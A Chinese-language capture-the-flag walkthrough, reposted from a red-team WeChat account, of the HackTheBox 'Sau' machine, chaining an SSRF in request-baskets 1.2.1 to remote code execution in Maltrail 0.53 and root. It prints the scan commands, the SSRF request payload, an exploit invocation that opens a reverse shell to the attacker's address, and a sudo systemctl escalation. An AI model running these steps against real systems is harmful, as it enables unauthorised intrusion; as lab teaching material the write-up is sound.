HTB-Sau靶机:技术干货!从SSRF到RCE

admin 2025年6月7日01:36:34评论16 views字数 1617阅读5分23秒阅读模式

SSRF 是常见的web漏洞,如何从这里撕开口子到RCE,进一步控制服务器最高权限,Sau实战靶场是个很好的例子,难度比较简单,快花2分钟来学习思路🤪

靶机地址

https://app.hackthebox.com/machines/551

适合读者

√ 渗透测试学习者√ 企业安全运维人员√ CTF竞赛战队√ 想掌握链式攻击思维的安全从业者

HTB-Sau靶机:技术干货!从SSRF到RCE

一、信息收集

VPN 连接正常,能够访问目标机器

HTB-Sau靶机:技术干货!从SSRF到RCE

端口扫描

nmap -sT --min-rate 10000 -p- 10.10.11.224 -oA nmapscan/ports
nmap -sT -Pn -sV -sC -O -p22,55555 10.10.11.224

只开放了 22 和 55555 端口,55555 是个 web 服务

HTB-Sau靶机:技术干货!从SSRF到RCE

使用 Nmap 自带脚本漏洞扫描没有结果

nmap -script=vuln -p22,55555 10.10.11.224 -oA nmapscan/vuln
HTB-Sau靶机:技术干货!从SSRF到RCE

Web 信息收集

访问主页发现是 request-baskets 搭建,版本 1.2.1

它是一种 Web 服务,用于收集任意 HTTP 请求并通过 RESTful API 或简单的 Web UI 检查它们

HTB-Sau靶机:技术干货!从SSRF到RCE
whatweb
HTB-Sau靶机:技术干货!从SSRF到RCE
dirsearch
dirsearch -u http://10.10.11.224:55555 -e * -i 200 --exclude-sizes=0B
HTB-Sau靶机:技术干货!从SSRF到RCE

信息整理

HTB-Sau靶机:技术干货!从SSRF到RCE

二、漏洞探测

SSRF

搜索得知 request-baskets 1.2.1 存在 ssrf 漏洞

参考链接:https://notes.sjtu.edu.cn/s/MUUhEymt7

首先在主页输入框填写任意字符串创建一个新的 baskets,开启抓包,修改为以下 payload 探测内网其他端口

POST /api/baskets/abcdef{  "forward_url": "http://127.0.0.1:80/",  "proxy_response": true,  "insecure_tls": false,  "expand_path": true,  "capacity": 250}
  • • 接口末尾的abcdef可以是任意字符
  • • forward_url是要探测的内网 web 端口,80 端口为例,请求 80 的根路径
  • • proxy_respons是否将目标流量转发出来

发送请求后返回一个 token

HTB-Sau靶机:技术干货!从SSRF到RCE

访问http://10.10.11.224:55555/web/abcdef,填写 token

HTB-Sau靶机:技术干货!从SSRF到RCE可以看到 basket 创建成功

根据提示http://10.10.11.224:55555/abcdef相当于访问http://10.10.11.224:80

HTB-Sau靶机:技术干货!从SSRF到RCE原先不能直接访问的 80 端口通过 ssrf 漏洞访问成功,80 端口的服务是用 Maltrail 创建
HTB-Sau靶机:技术干货!从SSRF到RCE

Getshell

进一步搜索发现 Maltrail 0.53 版本存在 RCE 漏洞

HTB-Sau靶机:技术干货!从SSRF到RCE

EXP: https://github.com/spookier/Maltrail-v0.53-Exploit

攻击机开启 nc 监听,执行 exp

python3 exploit.py 10.10.14.107 1234 http://10.10.11.224:55555/abcdef
HTB-Sau靶机:技术干货!从SSRF到RCE反弹 shell 成功,轻松拿下😉,在 /home 下找到普通用户 flag
HTB-Sau靶机:技术干货!从SSRF到RCE

三、权限提升

获取交互式 shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

sudo -l 发现一个可以 root 权限运行的命令

/usr/bin/systemctl status trail.service
HTB-Sau靶机:技术干货!从SSRF到RCE可以使用 systemctl 提取,参考:https://gtfobins.github.io/gtfobins/systemctl
HTB-Sau靶机:技术干货!从SSRF到RCE

经过尝试,使用上图中第三种方式提权成功,运行 sudo 命令后输入!sh敲回车,root到手😈

HTB-Sau靶机:技术干货!从SSRF到RCE
欢迎点击下方👇关注红队安全圈,获取更多红队实战技巧
有任何疑问后台私信或回复关键词 进群

原文始发于微信公众号(红队安全圈):HTB-Sau靶机:技术干货!从SSRF到RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日01:36:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Sau靶机:技术干货!从SSRF到RCEhttp://cn-sec.com/archives/3867978.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息